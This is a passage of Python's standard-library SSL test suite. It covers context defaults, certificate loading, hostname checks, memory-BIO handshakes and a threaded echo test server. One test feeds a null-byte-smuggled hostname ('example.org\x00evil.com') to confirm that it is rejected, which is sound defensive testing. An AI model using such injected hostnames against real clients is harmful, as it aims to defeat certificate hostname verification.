def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "non-Windows specific")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with os_helper.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
@unittest.skipIf(hasattr(sys, "gettotalrefcount"), "Debug build does not share environment between CRTs")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with os_helper.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def _assert_context_options(self, ctx):
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
if OP_NO_COMPRESSION != 0:
self.assertEqual(ctx.options & OP_NO_COMPRESSION,
OP_NO_COMPRESSION)
if OP_SINGLE_DH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_DH_USE,
OP_SINGLE_DH_USE)
if OP_SINGLE_ECDH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_ECDH_USE,
OP_SINGLE_ECDH_USE)
if OP_CIPHER_SERVER_PREFERENCE != 0:
self.assertEqual(ctx.options & OP_CIPHER_SERVER_PREFERENCE,
OP_CIPHER_SERVER_PREFERENCE)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self._assert_context_options(ctx)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self._assert_context_options(ctx)
with warnings_helper.check_warnings():
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
with warnings_helper.check_warnings():
ctx = ssl._create_stdlib_context(
ssl.PROTOCOL_TLSv1_2,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True
)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1_2)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test_check_hostname(self):
with warnings_helper.check_warnings():
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set CERT_REQUIRED
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# Changing verify_mode does not affect check_hostname
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# keep CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
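# In short: enabling check_hostname on a context whose verify_mode is
# CERT_NONE automatically raises verify_mode to CERT_REQUIRED, and verify_mode
# cannot be lowered back to CERT_NONE until check_hostname has been disabled
# first, which is exactly the ordering the assertions above walk through.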
def test_context_client_server(self):
# PROTOCOL_TLS_CLIENT has sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# PROTOCOL_TLS_SERVER has different but also sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_custom_class(self):
class MySSLSocket(ssl.SSLSocket):
pass
class MySSLObject(ssl.SSLObject):
pass
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.sslsocket_class = MySSLSocket
ctx.sslobject_class = MySSLObject
with ctx.wrap_socket(socket.socket(), server_side=True) as sock:
self.assertIsInstance(sock, MySSLSocket)
obj = ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(), server_side=True)
self.assertIsInstance(obj, MySSLObject)
def test_num_tickets(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.num_tickets, 2)
ctx.num_tickets = 1
self.assertEqual(ctx.num_tickets, 1)
ctx.num_tickets = 0
self.assertEqual(ctx.num_tickets, 0)
with self.assertRaises(ValueError):
ctx.num_tickets = -1
with self.assertRaises(TypeError):
ctx.num_tickets = None
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.num_tickets, 2)
with self.assertRaises(ValueError):
ctx.num_tickets = 1
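# Note: per the ssl documentation, num_tickets controls how many TLS 1.3
# session tickets a server context issues; it can be read on any context but,
# as asserted above, assignment is only permitted on PROTOCOL_TLS_SERVER
# contexts.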
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of an SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with socket.create_server(("127.0.0.1", 0)) as s:
c = socket.create_connection(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
def test_bad_server_hostname(self):
ctx = ssl.create_default_context()
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="")
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname=".example.org")
with self.assertRaises(TypeError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="example.org\x00evil.com")
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
class SSLObjectTests(unittest.TestCase):
def test_private_init(self):
bio = ssl.MemoryBIO()
with self.assertRaisesRegex(TypeError, "public constructor"):
ssl.SSLObject(bio, bio)
def test_unwrap(self):
client_ctx, server_ctx, hostname = testing_context()
c_in = ssl.MemoryBIO()
c_out = ssl.MemoryBIO()
s_in = ssl.MemoryBIO()
s_out = ssl.MemoryBIO()
client = client_ctx.wrap_bio(c_in, c_out, server_hostname=hostname)
server = server_ctx.wrap_bio(s_in, s_out, server_side=True)
# Loop on the handshake for a bit to get it settled
for _ in range(5):
try:
client.do_handshake()
except ssl.SSLWantReadError:
pass
if c_out.pending:
s_in.write(c_out.read())
try:
server.do_handshake()
except ssl.SSLWantReadError:
pass
if s_out.pending:
c_in.write(s_out.read())
# Now the handshakes should be complete (don't raise WantReadError)
client.do_handshake()
server.do_handshake()
# Now if we unwrap one side unilaterally, it should send close-notify
# and raise WantReadError:
with self.assertRaises(ssl.SSLWantReadError):
client.unwrap()
# But server.unwrap() does not raise, because it reads the client's
# close-notify:
s_in.write(c_out.read())
server.unwrap()
# And now that the client gets the server's close-notify, it doesn't
# raise either.
c_in.write(s_out.read())
client.unwrap()
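# The loop above is the canonical memory-BIO pattern: wrap_bio() returns an
# SSLObject that never touches a real socket, so the caller must shuttle
# whatever appears in the outgoing BIO to the peer and feed received bytes
# into the incoming BIO until do_handshake()/unwrap() stop raising
# SSLWantReadError. SimpleBackgroundTests.ssl_io_loop() below implements the
# same pump against a real socket.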
class SimpleBackgroundTests(unittest.TestCase):
"""Tests that connect to a simple server running in the background"""
def setUp(self):
self.server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.server_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=self.server_context)
self.server_addr = (HOST, server.port)
server.__enter__()
self.addCleanup(server.__exit__, None, None, None)
def test_connect(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
self.assertFalse(s.server_side)
# this should succeed because we specify the root cert
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA) as s:
s.connect(self.server_addr)
self.assertTrue(s.getpeercert())
self.assertFalse(s.server_side)
def test_connect_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA)
self.addCleanup(s.close)
self.assertEqual(0, s.connect_ex(self.server_addr))
self.assertTrue(s.getpeercert())
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.setblocking(False)
rc = s.connect_ex(self.server_addr)
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
def test_connect_with_context(self):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
# Same with a server hostname
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="dummy") as s:
s.connect(self.server_addr)
ctx.verify_mode = ssl.CERT_REQUIRED
# This should succeed because we specify the root cert
ctx.load_verify_locations(SIGNING_CA)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_with_context_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
s = ctx.wrap_socket(
socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME
)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=BYTES_CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_cadata(self):
with open(SIGNING_CA) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
ss = test_wrap_socket(socket.socket(socket.AF_INET))
ss.connect(self.server_addr)
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
s = socket.socket(socket.AF_INET)
s.connect(self.server_addr)
s.setblocking(False)
s = test_wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
self.addCleanup(s.close)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
_test_get_server_certificate(self, *self.server_addr, cert=SIGNING_CA)
def test_get_server_certificate_sni(self):
host, port = self.server_addr
server_names = []
# We store servername_cb arguments to make sure they match the host
def servername_cb(ssl_sock, server_name, initial_context):
server_names.append(server_name)
self.server_context.set_servername_callback(servername_cb)
pem = ssl.get_server_certificate((host, port))
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=SIGNING_CA)
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port, pem))
self.assertEqual(server_names, [host, host])
def test_get_server_certificate_fail(self):
# Connection failure crashes ThreadedEchoServer, so run this in an
# independent test method
_test_get_server_certificate_fail(self, *self.server_addr)
def test_get_server_certificate_timeout(self):
def servername_cb(ssl_sock, server_name, initial_context):
time.sleep(0.2)
self.server_context.set_servername_callback(servername_cb)
with self.assertRaises(socket.timeout):
ssl.get_server_certificate(self.server_addr, ca_certs=SIGNING_CA,
timeout=0.1)
def test_ciphers(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(self.server_addr)
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(self.server_addr)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = test_wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(self.server_addr)
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname='localhost') as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
self.assertEqual(len(ctx.get_ca_certs()), 1)
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx1.load_verify_locations(capath=CAPATH)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx2.load_verify_locations(capath=CAPATH)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s, server_hostname='localhost') as ss:
ss.connect(self.server_addr)
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
# A simple I/O loop: call func(*args) and, depending on the error we get
# (WANT_READ or WANT_WRITE), move data between the socket and the BIOs.
timeout = kwargs.get('timeout', support.SHORT_TIMEOUT)
deadline = time.monotonic() + timeout
count = 0
while True:
if time.monotonic() > deadline:
self.fail("timeout")
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
def test_bio_handshake(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.load_verify_locations(SIGNING_CA)
sslobj = ctx.wrap_bio(incoming, outgoing, False,
SIGNED_CERTFILE_HOSTNAME)
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNone(sslobj.version())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertIsNotNone(sslobj.version())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# If the server shuts down the TCP connection without sending a
# secure shutdown message, this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
def test_bio_read_write_data(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'FOO\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf, b'foo\n')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
class NetworkedTests(unittest.TestCase):
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with socket_helper.transient_internet(REMOTE_HOST):
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
elif rc == errno.ENETUNREACH:
self.skipTest("Network unreachable.")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'Needs IPv6')
def test_get_server_certificate_ipv6(self):
with socket_helper.transient_internet('ipv6.google.com'):
_test_get_server_certificate(self, 'ipv6.google.com', 443)
_test_get_server_certificate_fail(self, 'ipv6.google.com', 443)
def _test_get_server_certificate(test, host, port, cert=None):
pem = ssl.get_server_certificate((host, port))
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=cert)
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
def _test_get_server_certificate_fail(test, host, port):
try:
pem = ssl.get_server_certificate((host, port), ca_certs=CERTFILE)
except ssl.SSLError as x:
# should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
test.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(True)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ConnectionResetError, BrokenPipeError, ConnectionAbortedError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# BrokenPipeError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake.
# https://github.com/openssl/openssl/issues/6342
#
# ConnectionAbortedError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake when using WinSock.
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.close()
return False
except (ssl.SSLError, OSError) as e:
# OSError may occur with wrong protocols, e.g. both
# sides use PROTOCOL_TLS_SERVER.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
#
# bpo-31323: Store the exception as string to prevent
# a reference leak: server -> conn_errors -> exception
# -> traceback -> self (ConnectionHandler) -> server
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
if cert_binary is None:
sys.stdout.write(" client did not provide a cert\n")
else:
sys.stdout.write(f" cert binary is {len(cert_binary)}b\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
try:
self.sock = self.sslconn.unwrap()
except OSError:
# Many tests shut the TCP connection down
# without an SSL shutdown. This causes
# unwrap() to raise OSError with errno=0!
pass
else:
self.sslconn = None
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
